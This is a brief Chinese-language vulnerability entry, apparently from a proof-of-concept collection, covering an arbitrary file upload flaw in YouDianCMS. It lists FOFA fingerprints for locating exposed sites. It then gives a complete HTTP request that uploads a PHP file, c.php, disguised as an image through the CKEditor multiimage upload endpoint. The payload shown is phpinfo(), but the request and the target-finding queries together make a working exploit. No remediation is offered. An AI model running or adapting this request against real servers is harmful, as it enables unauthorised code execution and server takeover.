漏洞描述
YouDianCMS友点系统存在任意文件上传漏洞 ,攻击者可利用该漏洞获取服务器控制权限。
受影响版本
友点企业网站管理系统
FOFA关键字
icon_hash=”1728964041”
app=”友点建站-CMS”
漏洞复现
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 185
Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2
--cadc403efc1ad12f5fcce44c172baad2
Content-Disposition: form-data; name="files"; filename="c.php"
Content-Type: image/jpg
<?php phpinfo();?>
--cadc403efc1ad12f5fcce44c172baad2--